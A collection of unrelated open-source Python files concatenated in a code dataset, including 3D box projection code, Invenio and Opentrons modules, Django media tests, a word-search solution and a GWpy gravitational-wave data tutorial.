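    gt_label = torch.tensor([1, 0, -1])  # positive, negative, ignored
    # -> smooth L1 over the positive row only, divided by 2 counted samples
    return _fast_rcnn_loc_loss(pred_loc, gt_loc, gt_label, sigma=1.0)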
def generate_3d_bbox(pred_bboxs):
    # Returns 3D corner coordinates in a frame whose origin is the bottom-left corner.
n_bbox = pred_bboxs.shape[0]
zeros = np.zeros((n_bbox, 1))
    heights = np.ones((n_bbox, 1)) * Const.car_height  # top-face corners sit at car height
ymax, xmax, ymin, xmin = pred_bboxs[:, 0].reshape(-1, 1), pred_bboxs[:, 1].reshape(-1, 1), pred_bboxs[:, 2].reshape(
-1, 1), pred_bboxs[:, 3].reshape(-1, 1)
pt0s = np.concatenate((xmax, Const.grid_height - ymin, zeros), axis=1).reshape(1, n_bbox, 3)
pt1s = np.concatenate((xmin, Const.grid_height - ymin, zeros), axis=1).reshape(1, n_bbox, 3)
pt2s = np.concatenate((xmin, Const.grid_height - ymax, zeros), axis=1).reshape(1, n_bbox, 3)
pt3s = np.concatenate((xmax, Const.grid_height - ymax, zeros), axis=1).reshape(1, n_bbox, 3)
pth0s = np.concatenate((xmax, Const.grid_height - ymin, heights), axis=1).reshape(1, n_bbox, 3)
pth1s = np.concatenate((xmin, Const.grid_height - ymin, heights), axis=1).reshape(1, n_bbox, 3)
pth2s = np.concatenate((xmin, Const.grid_height - ymax, heights), axis=1).reshape(1, n_bbox, 3)
pth3s = np.concatenate((xmax, Const.grid_height - ymax, heights), axis=1).reshape(1, n_bbox, 3)
res = np.vstack((pt0s, pt1s, pt2s, pt3s, pth0s, pth1s, pth2s, pth3s)).transpose(1, 0, 2)
return res
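# Illustrative sketch: a single BEV box in (ymax, xmax, ymin, xmin) column
# order becomes 8 corner points, 4 on the ground plane and 4 lifted to
# Const.car_height, all in the bottom-left-origin world frame.
def _demo_generate_3d_bbox():
    bev_boxes = np.array([[100.0, 200.0, 50.0, 150.0]])  # ymax, xmax, ymin, xmin
    corners = generate_3d_bbox(bev_boxes)
    # corners.shape == (1, 8, 3)
    return corners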
def getimage_pt(points3d, extrin, intrin):
    # The input point is in the bottom-left-origin world frame; the output is an
    # OpenCV-style image point with a top-left origin.
    newpoints3d = np.vstack((points3d, 1.0))
    Zc = np.dot(extrin, newpoints3d)[-1]
    imagepoints = (np.dot(intrin, np.dot(extrin, newpoints3d)) / Zc).astype(int)
return [imagepoints[0, 0], imagepoints[1, 0]]
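# Hedged single-point sketch: project one world point with a toy 3x4 extrinsic
# and 3x3 intrinsic matrix (both made up for illustration; the real calibration
# comes from the dataset loader).
def _demo_getimage_pt():
    point = np.array([[1.0], [2.0], [10.0]])           # column vector, world frame
    extrin = np.hstack([np.eye(3), np.zeros((3, 1))])  # toy [R | t]
    intrin = np.array([[800.0, 0.0, 320.0],
                       [0.0, 800.0, 240.0],
                       [0.0, 0.0, 1.0]])
    # -> [400, 400] for this toy calibration
    return getimage_pt(point, extrin, intrin)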
def getprojected_3dbox(points3ds, extrin, intrin, isleft=True):
if isleft:
extrin_ = extrin[0].numpy()
intrin_ = intrin[0].numpy()
else:
extrin_ = extrin[1].numpy()
intrin_ = intrin[1].numpy()
extrin_big = extrin_.repeat(points3ds.shape[0] * points3ds.shape[1], axis=0)
intrin_big = intrin_.repeat(points3ds.shape[0] * points3ds.shape[1], axis=0)
points3ds_big = points3ds.reshape(points3ds.shape[0], points3ds.shape[1], 3, 1)
homog = np.ones((points3ds.shape[0], points3ds.shape[1], 1, 1))
homo3dpts = np.concatenate((points3ds_big, homog), 2).reshape(points3ds.shape[0] * points3ds.shape[1], 4, 1)
res = np.matmul(extrin_big, homo3dpts)
Zc = res[:, -1]
res2 = np.matmul(intrin_big, res)
imagepoints = (res2.reshape(-1, 3) / Zc).reshape((points3ds.shape[0], points3ds.shape[1], 3))[:, :, :2].astype(int)
return imagepoints
def get_outter(projected_3dboxes):
projected_3dboxes = projected_3dboxes + 1e-3
zero_mask = np.zeros((projected_3dboxes.shape[0], projected_3dboxes.shape[1], 1))
one_mask = np.ones((projected_3dboxes.shape[0], projected_3dboxes.shape[1], 1))
huge_mask = one_mask * 1000
ymax_mask = np.concatenate((zero_mask, one_mask), axis=2)
xmax_mask = np.concatenate((one_mask, zero_mask), axis=2)
ymin_mask = np.concatenate((huge_mask, one_mask), axis=2)
xmin_mask = np.concatenate((one_mask, huge_mask), axis=2)
xmax = np.max((projected_3dboxes * xmax_mask), axis=(1, 2)).reshape(1, -1, 1)
ymax = np.max((projected_3dboxes * ymax_mask), axis=(1, 2)).reshape(1, -1, 1)
xmin = np.min((projected_3dboxes * xmin_mask), axis=(1, 2)).reshape(1, -1, 1)
ymin = np.min((projected_3dboxes * ymin_mask), axis=(1, 2)).reshape(1, -1, 1)
res = np.concatenate((ymin, xmin, ymax, xmax), axis=2)
res = np.array(res, dtype=int).squeeze()
return res
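# Hedged end-to-end sketch: corners from generate_3d_bbox can be projected with
# getprojected_3dbox and collapsed to axis-aligned 2D image boxes with
# get_outter. The extrin/intrin arguments are assumed to be the same
# (left, right) calibration tensors used elsewhere in this file.
def _demo_bev_to_image_boxes(extrin, intrin):
    bev_boxes = np.array([[100.0, 200.0, 50.0, 150.0]])                      # ymax, xmax, ymin, xmin
    corners3d = generate_3d_bbox(bev_boxes)                                  # (1, 8, 3)
    corners2d = getprojected_3dbox(corners3d, extrin, intrin, isleft=False)  # (1, 8, 2)
    return get_outter(corners2d)                                             # (ymin, xmin, ymax, xmax)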
def main(args):
if args.seed is not None:
np.random.seed(args.seed)
torch.manual_seed(7)
torch.backends.cudnn.benchmark = True
else:
torch.backends.cudnn.benchmark = True
# dataset
normalize = T.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225))
denormalize = img_color_denormalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225))
test_trans = T.Compose([T.ToTensor(), normalize])
data_path = os.path.expanduser(Const.data_root)
base = MVM3D(data_path, args, worldgrid_shape=Const.grid_size)
test_set = MVM3D_loader(base, train=2, transform=test_trans, grid_reduce=Const.reduce)
test_loader = torch.utils.data.DataLoader(test_set, batch_size=1, shuffle=False,
num_workers=8, pin_memory=True, drop_last=True)
# model
model = PerspTransDetector(test_set)
mbon_head = MbonHead(Const.roi_classes + 1, 7, 1 / Const.reduce)
trainer = Inferer(model, mbon_head, denormalize)
model.load_state_dict(torch.load('pretrained_models/ppn.pth'))
mbon_head.load_state_dict(torch.load('pretrained_models/mbon.pth'))
mbon_head.eval()
model.eval()
trainer.infer(test_loader)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='MVM3D')
parser.add_argument('-d', '--dataset', type=str, default='robo', choices=['wildtrack' ,'robo'])
parser.add_argument('-j', '--num_workers', type=int, default=8)
parser.add_argument('-b', '--batch_size', type=int, default=1, metavar='N',
help='input batch size for training (default: 1)')
    parser.add_argument('--seed', type=int, default=7, help='random seed (default: 7)')
parser.add_argument('--resume', type=bool, default = True)
args = parser.parse_args()
main(args)
|
StarcoderdataPython
|
38111
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2019 CERN.
# Copyright (C) 2019 Northwestern University.
#
# Invenio-RDM-Records is free software; you can redistribute it and/or modify
# it under the terms of the MIT License; see LICENSE file for more details.
"""DataCite-based data model for Invenio."""
from .utils import previewer_record_file_factory
def _(x):
"""Identity function for string extraction."""
return x
# Records REST API endpoints.
# NOTE: We have to keep this until invenio-records-files and
# invenio-communities use the new records-resources way of creating APIs
RECORDS_REST_ENDPOINTS = {}
"""REST API for invenio_rdm_records."""
# Files REST
# FILES_REST_PERMISSION_FACTORY = record_files_permission_factory
"""Set default files permission factory."""
# Invenio-IIIF
# =================
# See https://invenio-iiif.readthedocs.io/en/latest/configuration.html
IIIF_PREVIEW_TEMPLATE = "invenio_rdm_records/iiif_preview.html"
"""Template for IIIF image preview."""
# Invenio-Previewer
# =================
# See https://github.com/inveniosoftware/invenio-previewer/blob/master/invenio_previewer/config.py # noqa
PREVIEWER_PREFERENCE = [
'csv_dthreejs',
# TODO: IIIF checks bucket-level permissions, and thus won't work
# 'iiif_image',
'simple_image',
'json_prismjs',
'xml_prismjs',
'mistune',
'pdfjs',
'ipynb',
'zip',
]
"""Preferred previewers."""
# Invenio-Records-UI
# ==================
# See https://invenio-records-ui.readthedocs.io/en/latest/configuration.html
RECORDS_UI_ENDPOINTS = {
'recid': {
'pid_type': 'recid',
'record_class': 'invenio_rdm_records.records:BibliographicRecord',
'route': '/records/<pid_value>',
'template': 'invenio_rdm_records/record_landing_page.html'
},
'recid_files': {
'pid_type': 'recid',
'record_class': 'invenio_rdm_records.records:BibliographicRecord',
'route': '/records/<pid_value>/files/<path:filename>',
'view_imp': 'invenio_rdm_records.theme.views.file_download_ui',
},
'recid_previewer': {
'pid_type': 'recid',
'record_class': 'invenio_rdm_records.records:BibliographicRecord',
'route': '/records/<pid_value>/preview/<path:filename>',
'view_imp': 'invenio_previewer.views.preview',
},
}
"""Records UI for RDM Records."""
# Invenio-Formatter
# =================
FORMATTER_BADGES_ALLOWED_TITLES = ['DOI', 'doi']
"""List of allowed titles in badges."""
FORMATTER_BADGES_TITLE_MAPPING = {'doi': 'DOI'}
"""Mapping of titles."""
# Invenio-RDM-Records
# ===================
RDM_RECORDS_LOCAL_DOI_PREFIXES = ['10.9999']
"""List of locally managed DOI prefixes."""
RDM_RECORDS_METADATA_NAMESPACES = {}
"""Namespaces for fields *added* to the metadata schema.
Of the shape:
.. code-block:: python
{
'<prefix1>': {
'@context': '<url>'
},
# ...
'<prefixN>': {
'@context': '<url>'
}
}
For example:
.. code-block:: python
{
'dwc': {
'@context': 'http://rs.tdwg.org/dwc/terms/'
},
'z':{
'@context': 'https://zenodo.org/terms'
}
}
Use :const:`invenio_rdm_records.config.RDM_RECORDS_METADATA_EXTENSIONS` to
define the added fields.
See :class:`invenio_rdm_records.services.schemas.\
metadata_extensions.MetadataExtensions` for
how this configuration variable is used.
"""
RDM_RECORDS_METADATA_EXTENSIONS = {}
"""Fields added to the metadata schema.
Of the shape:
.. code-block:: python
{
'<prefix1>:<field1>': {
'elasticsearch': '<allowed elasticsearch type>'
'marshmallow': '<allowed marshmallow type>'
},
# ...
'<prefixN>:<fieldN>': {
'elasticsearch': '<allowed elasticsearch type>'
'marshmallow': '<allowed marshmallow type>'
}
}
For example:
.. code-block:: python
{
'dwc:family': {
'elasticsearch': 'keyword',
'marshmallow': SanitizedUnicode()
},
'dwc:behavior': {
'elasticsearch': 'text',
'marshmallow': SanitizedUnicode()
},
'z:department': {
'elasticsearch': 'text',
'marshmallow': SanitizedUnicode()
}
}
Use :const:`invenio_rdm_records.config.RDM_RECORDS_METADATA_NAMESPACES` to
define the prefixes.
See :class:`invenio_rdm_records.services.schemas.\
metadata_extensions.MetadataExtensions` for
allowed types and how this configuration variable is used.
"""
RDM_RECORDS_CUSTOM_VOCABULARIES = {}
"""Paths to custom controlled vocabularies.
Of the shape:
.. code-block:: python
{
'<dotted>.<path>.<to field1>': {
'path': '<absolute path to CSV file containing it>'
},
# ...
'<dotted>.<path>.<to fieldN>': {
'path': '<absolute path to CSV file containing it>'
}
}
For example:
.. code-block:: python
{
'resource_type': {
'path': os.path.join(
os.path.dirname(os.path.abspath(__file__)),
'my_resource_types.csv'
)
},
'contributors.role': {
'path': os.path.join(
os.path.dirname(os.path.abspath(__file__)),
'my_contributor_roles.csv'
)
}
}
"""
RDM_RECORDS_UI_EDIT_URL = "/uploads/<pid_value>"
"""Default UI URL for the edit page of a Bibliographic Record."""
#: Default site URL (used only when not in a context - e.g. like celery tasks).
THEME_SITEURL = "http://localhost:5000"
PREVIEWER_RECORD_FILE_FACTORY = previewer_record_file_factory
|
StarcoderdataPython
|
133611
|
"""Basic pipette data state and store."""
from dataclasses import dataclass
from typing import Dict, List, Mapping, Optional, Tuple
from typing_extensions import final
from opentrons_shared_data.pipette.dev_types import PipetteName
from opentrons.hardware_control.dev_types import PipetteDict
from opentrons.types import MountType, Mount as HwMount
from .. import command_models as cmd, errors
from .substore import Substore, CommandReactive
@final
@dataclass(frozen=True)
class PipetteData:
"""Pipette state data."""
mount: MountType
pipette_name: PipetteName
@final
@dataclass(frozen=True)
class HardwarePipette:
"""Hardware pipette data."""
mount: HwMount
config: PipetteDict
class PipetteState:
"""Basic labware data state and getter methods."""
_pipettes_by_id: Dict[str, PipetteData]
def __init__(self) -> None:
"""Initialize a PipetteState instance."""
self._pipettes_by_id = {}
def get_pipette_data_by_id(self, pipette_id: str) -> PipetteData:
"""Get pipette data by the pipette's unique identifier."""
try:
return self._pipettes_by_id[pipette_id]
except KeyError:
raise errors.PipetteDoesNotExistError(
f"Pipette {pipette_id} not found."
)
def get_all_pipettes(self) -> List[Tuple[str, PipetteData]]:
"""Get a list of all pipette entries in state."""
return [entry for entry in self._pipettes_by_id.items()]
def get_pipette_data_by_mount(
self,
mount: MountType
) -> Optional[PipetteData]:
"""Get pipette data by the pipette's mount."""
for pipette in self._pipettes_by_id.values():
if pipette.mount == mount:
return pipette
return None
def get_hardware_pipette(
self,
pipette_id: str,
attached_pipettes: Mapping[HwMount, Optional[PipetteDict]],
) -> HardwarePipette:
"""Get a pipette's hardware configuration and state by ID."""
pipette_data = self.get_pipette_data_by_id(pipette_id)
pipette_name = pipette_data.pipette_name
mount = pipette_data.mount
hw_mount = mount.to_hw_mount()
hw_config = attached_pipettes[hw_mount]
if hw_config is None:
            raise errors.PipetteNotAttachedError(f"No pipette attached to {mount}")
# TODO(mc, 2020-11-12): support hw_pipette.act_as
elif hw_config["name"] != pipette_name:
raise errors.PipetteNotAttachedError(
f"Found {hw_config['name']} on {mount}, "
f"but {pipette_id} is a {pipette_name}"
)
return HardwarePipette(mount=hw_mount, config=hw_config)
class PipetteStore(Substore[PipetteState], CommandReactive):
"""Pipette state container."""
_state: PipetteState
def __init__(self) -> None:
"""Initialize a PipetteStore and its state."""
self._state = PipetteState()
def handle_completed_command(
self,
command: cmd.CompletedCommandType
) -> None:
"""Modify state in reaction to a completed command."""
if isinstance(command.result, cmd.LoadPipetteResult):
pipette_id = command.result.pipetteId
self._state._pipettes_by_id[pipette_id] = PipetteData(
pipette_name=command.request.pipetteName,
mount=command.request.mount
)
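# Hedged usage sketch: constructing a completed LoadPipette command requires the
# command models, so it is taken as an argument here. The private _state
# attribute defined above is used directly to avoid assuming Substore's public
# API.
def _demo_pipette_store_usage(
    completed_load_pipette: cmd.CompletedCommandType,
) -> PipetteData:
    """Feed one completed LoadPipette command into a store and read state back."""
    store = PipetteStore()
    store.handle_completed_command(completed_load_pipette)
    return store._state.get_pipette_data_by_id(
        completed_load_pipette.result.pipetteId
    )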
|
StarcoderdataPython
|
3219640
|
import pytoml as toml
def get_cfg(path):
# read config file
with open(path, "r") as f:
cfg = toml.load(f)
return cfg
def flit_metadata(cfg):
return cfg.get("tool").get("flit").get("metadata")
def snakeye_metadata(cfg):
return cfg.get("tool").get("snakeye").get("metadata")
def get_dependencies(cfg):
return cfg.get("tool").get("snakeye").get("dependencies")
def set_dependencies(cfg, deps):
cfg["tool"]["snakeye"]["dependencies"] = deps
return cfg
def display_deps(flit, snakeye, deps):
print("{} {} {}".format(flit["module"], snakeye["pkg_version"], snakeye["description"]))
print()
print("Dependencies: ")
length = len(deps)
i = 1
for dep, version in deps.items():
if i == 1:
print("├── {} {}".format(dep, version))
elif i == length:
print("└── {} {}".format(dep, version))
else:
print("├── {} {}".format(dep, version))
i += 1
|
StarcoderdataPython
|
4829689
|
<gh_stars>1-10
def test():
# Here we can either check objects created in the solution code, or the
# string value of the solution, available as __solution__. A helper for
# printing formatted messages is available as __msg__. See the testTemplate
# in the meta.json for details.
# If an assertion fails, the message will be displayed
assert "rename" in __solution__ , "Are you using the 'rename' function?"
assert "assign" in __solution__ , "Are you using the 'assign' function?"
assert "capture_rate" in __solution__ , "Are you renaming 'capture_rt' to capture_rate?"
assert "AD_total" in __solution__ , "Are you creating a new column 'AD_total' by adding 'defense' and 'attack'?"
assert pokemon_plot.mark == 'circle', "Are you using the 'mark_circle()' function?"
assert pokemon_plot.encoding.x.shorthand == 'AD_total', "Make sure you are plotting 'AD_total' on the x-axis."
assert pokemon_plot.encoding.y.shorthand == 'capture_rate', "Make sure you are plotting 'capture_rate' on the y-axis."
__msg__.good("Nice work, well done!")
|
StarcoderdataPython
|
1685473
|
"""
A Python library for the chorus.fightthe.pw site.
This uses the website's API and exposes it through a Python-friendly interface.
"""
from .pychorus import *
__all__ = [
"Song",
"search",
"latest",
"random",
"count",
"SongNotFoundError",
"PageNotFoundError"
]
__version__ = "0.023"
__author__ = "expliked"
|
StarcoderdataPython
|
4806274
|
<gh_stars>1-10
#!/usr/bin/env python
import fiona
import time
from rasterio.plot import show, show_hist
from projections.rasterset import RasterSet, Raster
import projections.predicts as predicts
import projections.modelr as modelr
# Open the mask shape file
shp_file = '../../data/from-adriana/tropicalforests.shp'
shapes = fiona.open(shp_file)
# Read Adriana's abundance model (mainland)
mod = modelr.load('../models/ab-corrected.rds')
predicts.predictify(mod)
# Import standard PREDICTS rasters
rasters = predicts.rasterset('1km', 'foo', 2005, 'historical')
rs = RasterSet(rasters, shapes = shapes, all_touched = True)
rs[mod.output] = mod
what = mod.output
stime = time.time()
data = rs.write(what, 'hires.tif')
etime = time.time()
print("executed in %6.2fs" % (etime - stime))
|
StarcoderdataPython
|
1767024
|
<filename>projects/manipulathor_baselines/armpointnav_baselines/experiments/ithor/armpointnav_disjoint_depth.py
import gym
import torch.nn as nn
from allenact_plugins.manipulathor_plugin.manipulathor_constants import ENV_ARGS
from allenact_plugins.manipulathor_plugin.manipulathor_task_samplers import (
ArmPointNavTaskSampler,
)
from projects.manipulathor_baselines.armpointnav_baselines.experiments.ithor.armpointnav_depth import (
ArmPointNavDepth,
)
from projects.manipulathor_baselines.armpointnav_baselines.models.disjoint_arm_pointnav_models import (
DisjointArmPointNavBaselineActorCritic,
)
class ArmPointNavDisjointDepth(ArmPointNavDepth):
"""An Object Navigation experiment configuration in iThor with RGB
input."""
TASK_SAMPLER = ArmPointNavTaskSampler
def __init__(self):
super().__init__()
assert (
self.CAMERA_WIDTH == 224
and self.CAMERA_HEIGHT == 224
and self.VISIBILITY_DISTANCE == 1
and self.STEP_SIZE == 0.25
)
self.ENV_ARGS = {**ENV_ARGS, "renderDepthImage": True}
@classmethod
def create_model(cls, **kwargs) -> nn.Module:
return DisjointArmPointNavBaselineActorCritic(
action_space=gym.spaces.Discrete(
len(cls.TASK_SAMPLER._TASK_TYPE.class_action_names())
),
observation_space=kwargs["sensor_preprocessor_graph"].observation_spaces,
hidden_size=512,
)
@classmethod
def tag(cls):
return cls.__name__
|
StarcoderdataPython
|
148711
|
import embedded_media as emb
from django.forms import Form, CharField, TextInput, Media
from django.test import TestCase
class EmbeddedMediaTest(TestCase):
def test_css(self):
## CSS rendering
css = emb.CSS('.mywidget { display: none; }')
self.assertHTMLEqual(css.render('all'),
'<style type="text/css" media="all">.mywidget { display: none; }</style>')
def test_js(self):
## JS rendering
js = emb.JS('init_mywidget();')
self.assertHTMLEqual(js.render(),
'<script type="text/javascript">init_mywidget();</script>')
def test_media(self):
## Embedded JavaScript and CSS
class MyWidget(TextInput):
class Media:
css = {'all': (emb.CSS('.mywidget { display: none; }'),)}
js = (emb.JS('init_mywidget();'),)
w = MyWidget()
self.assertHTMLEqual(str(w.media['css']),
'<style type="text/css" media="all">.mywidget { display: none; }</style>')
self.assertHTMLEqual(str(w.media['js']),
'<script type="text/javascript">init_mywidget();</script>')
def test_property(self):
## Embedded JavaScript and CSS as a media property
class MyWidget(TextInput):
def _media(self):
return Media(
css={'all': (emb.CSS('.mywidget { display: none; }'),)},
js=(emb.JS('init_mywidget();'),)
)
media = property(_media)
w = MyWidget()
self.assertHTMLEqual(str(w.media['css']),
'<style type="text/css" media="all">.mywidget { display: none; }</style>')
self.assertHTMLEqual(str(w.media['js']),
'<script type="text/javascript">init_mywidget();</script>')
def test_mutiple(self):
## Multiple instances of embedded media should only be rendered once
class MyWidget(TextInput):
def _media(self):
return Media(
css={'all': (emb.CSS('.mywidget { display: none; }'),)},
js=(emb.JS('init_mywidget();'),)
)
media = property(_media)
class MyForm(Form):
field1 = CharField(widget=MyWidget)
field2 = CharField(widget=MyWidget)
f = MyForm()
self.assertHTMLEqual(str(f.media), """
<style type="text/css" media="all">.mywidget { display: none; }</style>
<script type="text/javascript">init_mywidget();</script>
""")
|
StarcoderdataPython
|
1695736
|
<reponame>shenhuaze/leetcode-python<filename>code/word_search.py
"""
@author <NAME>
@date 2019-09-30
"""
def exist(board, word):
if board is None or len(board) == 0 or board[0] is None or len(board[0]) == 0:
return False
m = len(board)
n = len(board[0])
for i in range(m):
for j in range(n):
if search(board, i, j, m, n, word, 0):
return True
return False
def search(board, i, j, m, n, word, index):
if index == len(word):
return True
if i < 0 or j < 0 or i >= m or j >=n or board[i][j] == "#" or board[i][j] != word[index]:
return False
ch = board[i][j]
board[i][j] = "#"
result = (search(board, i - 1, j, m, n, word, index + 1) or
search(board, i + 1, j, m, n, word, index + 1) or
search(board, i, j - 1, m, n, word, index + 1) or
search(board, i, j + 1, m, n, word, index + 1))
board[i][j] = ch
return result
if __name__ == '__main__':
board_ = [
['A', 'B', 'C', 'E'],
['S', 'F', 'C', 'S'],
['A', 'D', 'E', 'E']
]
word_ = "ABCCED"
print(exist(board_, word_))
|
StarcoderdataPython
|
59936
|
from interactiongrader import Answer
from interactiongrader import ChangeType
from fuzzywuzzy import fuzz
def test_calculate_ranges():
ans = Answer()
ranges = ans.calculate_ranges()
assert ans.sentence == ''
assert ranges[ChangeType.FLIP] == 0.75
def test_random_change_type():
ans = Answer()
change = ans.random_change_type()
assert change in ChangeType
def test_misspell():
ans = Answer('Sample test')
misspelled = ans.misspell()
score = fuzz.ratio(misspelled, ans.sentence)
assert ans.sentence == 'Sample test'
assert ans.sentence != misspelled
assert score >= ans.minimum_fuzzy_score
def test_is_misspelling():
ans = Answer('<NAME>')
assert ans.is_misspelling('<NAME>')
ans = Answer('<NAME>')
assert ans.is_misspelling('<NAME>')
ans = Answer('<NAME>')
assert ans.is_misspelling('<NAME>')
|
StarcoderdataPython
|
3324820
|
#!/usr/bin/env python
# coding: utf-8
# <img style="float: left;padding: 1.3em" src="https://indico.in2p3.fr/event/18313/logo-786578160.png">
#
# # Gravitational Wave Open Data Workshop #3
#
#
# #### Tutorial 1.2: Introduction to GWpy
#
# This tutorial will briefly describe GWpy, a python package for gravitational astrophysics, and walk-through how you can use this to speed up access to, and processing of, GWOSC data.
#
# [Click this link to view this tutorial in Google Colaboratory](https://colab.research.google.com/github/gw-odw/odw-2019/blob/master/Day_1/Tuto%201.2%20Open%20Data%20access%20with%20GWpy.ipynb)
#
# <div class="alert alert-info">This notebook were generated using python 3.7, but should work on python 2.7, 3.6, or 3.7.</div>
# ## Installation (execute only if running on a cloud platform or if you haven't done the installation already!)
#
# Note: we use [`pip`](https://docs.python.org/3.6/installing/), but **it is recommended** to use [conda](https://docs.ligo.org/lscsoft/conda/) on your own machine, as explained in the [installation instructions](https://github.com/gw-odw/odw-2019/blob/master/setup.md). This usage might look a little different than normal, simply because we want to do this directly from the notebook.
# In[2]:
# -- Uncomment following line if running in Google Colab
#! pip install -q 'gwpy==1.0.1'
# **Important:** With Google Colab, you may need to restart the runtime after running the cell above.
# ## Initialization
# In[1]:
import gwpy
print(gwpy.__version__)
# ## A note on object-oriented programming
#
# Before we dive too deeply, its worth a quick aside on object-oriented programming (OOP).
# GWpy is heavily object-oriented, meaning almost all of the code you run using GWpy is based around an object of some type, e.g. `TimeSeries`.
# Most of the methods (functions) we will use are attached to an object, rather than standing alone, meaning you should have a pretty good idea of what sort of data you are dealing with (without having to read the documentation!).
#
# For a quick overview of object-oriented programming in Python, see [this blog post by <NAME>](https://jeffknupp.com/blog/2014/06/18/improve-your-python-python-classes-and-object-oriented-programming/).
# ## Handling data in the time domain
# #### Finding open data
#
# We have seen already that the `gwosc` module can be used to query for what data are available on GWOSC.
# The next thing to do is to actually read some open data. Let's try to get some for GW150914, the first direct detection of an astrophysical gravitational-wave signal from a BBH (binary black hole system).
#
# We can use the [`TimeSeries.fetch_open_data`](https://gwpy.github.io/docs/stable/api/gwpy.timeseries.TimeSeries.html#gwpy.timeseries.TimeSeries.fetch_open_data) method to download data directly from https://www.gw-openscience.org, but we need to know the GPS times.
# We can query for the GPS time of an event as follows:
# In[2]:
from gwosc.datasets import event_gps
gps = event_gps('GW150914')
print(gps)
# Now we can build a `[start, end)` GPS segment to 10 seconds around this time, using integers for convenience:
# In[3]:
segment = (int(gps)-5, int(gps)+5)
print(segment)
# and can now query for the full data.
# For this example we choose to retrieve data for the LIGO-Livingston interferometer, using the identifier `'L1'`.
# We could have chosen any of
#
# - `'G1`' - GEO600
# - `'H1'` - LIGO-Hanford
# - `'L1'` - LIGO-Livingston
# - `'V1'` - (Advanced) Virgo
#
# In the future, the Japanese observatory KAGRA will come online, with the identifier `'K1'`.
# In[4]:
from gwpy.timeseries import TimeSeries
ldata = TimeSeries.fetch_open_data('L1', *segment, verbose=True)
print(ldata)
# ##### The `verbose=True` flag lets us see that GWpy has discovered two files that provide the data for the given interval, downloaded them, and loaded the data.
# The files are not stored permanently, so next time you do the same call, it will be downloaded again, however, if you know you might repeat the same call many times, you can use `cache=True` to store the file on your computer.
#
# Notes:
#
# * To read data from a local file instead of from the GWOSC server, we can use [`TimeSeries.read`](https://gwpy.github.io/docs/stable/api/gwpy.timeseries.TimeSeries.html#gwpy.timeseries.TimeSeries.read) method.
#
# We have now downloaded real LIGO data for GW150914! These are the actual data used in the analysis that discovered the first binary black hole merger.
# To sanity check things, we can easily make a plot, using the [`plot()`](https://gwpy.github.io/docs/stable/timeseries/plot.html) method of the `data` `TimeSeries`.
# <div class="alert alert-info">
# Since this is the first time we are plotting something in this notebook, we need to make configure `matplotlib` (the plotting library) to work within the notebook properly:
# </div>
# Matplotlib documentation can be found [`here`](https://matplotlib.org/contents.html).
# In[5]:
get_ipython().run_line_magic('matplotlib', 'inline')
plot = ldata.plot()
# Notes: There are alternative ways to access the GWOSC data.
#
# * [`readligo`](https://losc.ligo.org/s/sample_code/readligo.py) is a light-weight Python module that returns the time series into a Numpy array.
# * The [PyCBC](http://github.com/ligo-cbc/pycbc) package has the `pycbc.frame.query_and_read_frame` and `pycbc.frame.read_frame` methods. We use [PyCBC](http://github.com/ligo-cbc/pycbc) in Tutorial 2.1, 2.2 and 2.3.
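# As a rough sketch of the PyCBC route mentioned above (kept commented out, like the optional install cell earlier; the frame file name and channel name are placeholder assumptions):

# In[ ]:

# from pycbc.frame import read_frame
# strain = read_frame('L-L1_GWOSC_4KHZ_R1-1126259446-32.gwf', 'L1:GWOSC-4KHZ_R1_STRAIN')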
# ## Handling data in the frequency domain using the Fourier transform
#
# The [Fourier transform](https://en.wikipedia.org/wiki/Fourier_transform) is a widely-used mathematical tool to expose the frequency-domain content of a time-domain signal, meaning we can see which frequencies contain lots of power, and which have less.
#
# We can calculate the Fourier transform of our `TimeSeries` using the [`fft()`](https://gwpy.github.io/docs/stable/api/gwpy.timeseries.TimeSeries.html#gwpy.timeseries.TimeSeries.fft) method:
# In[6]:
fft = ldata.fft()
print(fft)
# The result is a [`FrequencySeries`](https://gwpy.github.io/docs/stable/frequencyseries/), with complex amplitude, representing the amplitude and phase of each frequency in our data.
# We can use `abs()` to extract the amplitude and plot that:
# In[7]:
plot = fft.abs().plot(xscale="log", yscale="log")
plot.show(warn=False)
# This doesn't look correct at all!
# The problem is that the FFT works under the assumption that our data are periodic, which means that the edges of our data look like discontinuities when transformed.
# We need to apply a window function to our time-domain data before transforming, which we can do using the [`scipy.signal`](https://docs.scipy.org/doc/scipy/reference/signal.html) module:
# In[8]:
from scipy.signal import get_window
window = get_window('hann', ldata.size)
lwin = ldata * window
# Let's try our transform again and see what we get
# In[9]:
fftamp = lwin.fft().abs()
plot = fftamp.plot(xscale="log", yscale="log")
plot.show(warn=False)
# This looks a little more like what we expect for the amplitude spectral density of a gravitational-wave detector.
# ## Calculating the power spectral density
#
# In practice, we typically use a large number of FFTs to estimate an average power spectral density over a long period of data.
# We can do this using the [`asd()`](https://gwpy.github.io/docs/stable/api/gwpy.timeseries.TimeSeries.html#gwpy.timeseries.TimeSeries.asd) method, which uses [Welch's method](https://en.wikipedia.org/wiki/Welch%27s_method) to combine FFTs of overlapping, windowed chunks of data.
# In[10]:
asd = ldata.asd(fftlength=4, method="median")
plot = asd.plot()
plot.show(warn=False)
# In[11]:
ax = plot.gca()
ax.set_xlim(10, 1400)
ax.set_ylim(2e-24, 1e-20)
plot
# The ASD is a standard tool used to study the frequency-domain sensitivity of a gravitational-wave detector.
# For the LIGO-Livingston data we loaded, we can see large spikes at certain frequencies, including
#
# - ~300 Hz
# - ~500 Hz
# - ~1000 Hz
#
# The [O2 spectral lines](https://www.gw-openscience.org/o2speclines/) page on GWOSC describes a number of these spectral features for O2, with some of them being forced upon us, and some being deliberately introduced to help with interferometer control.
#
# Loading more data allows for more FFTs to be averaged during the ASD calculation, meaning random variations get averaged out, and we can see more detail:
# In[12]:
ldata2 = TimeSeries.fetch_open_data('L1', int(gps)-512, int(gps)+512, cache=True)
lasd2 = ldata2.asd(fftlength=4, method="median")
plot = lasd2.plot()
ax = plot.gca()
ax.set_xlim(10, 1400)
ax.set_ylim(5e-24, 1e-20)
plot.show(warn=False)
# Now we can see some more features, including sets of lines around ~30 Hz and ~65 Hz, and some more isolated lines through the more sensitive region.
#
# For comparison, we can load the LIGO-Hanford data and plot that as well:
# In[13]:
# get Hanford data
hdata2 = TimeSeries.fetch_open_data('H1', int(gps)-512, int(gps)+512, cache=True)
hasd2 = hdata2.asd(fftlength=4, method="median")
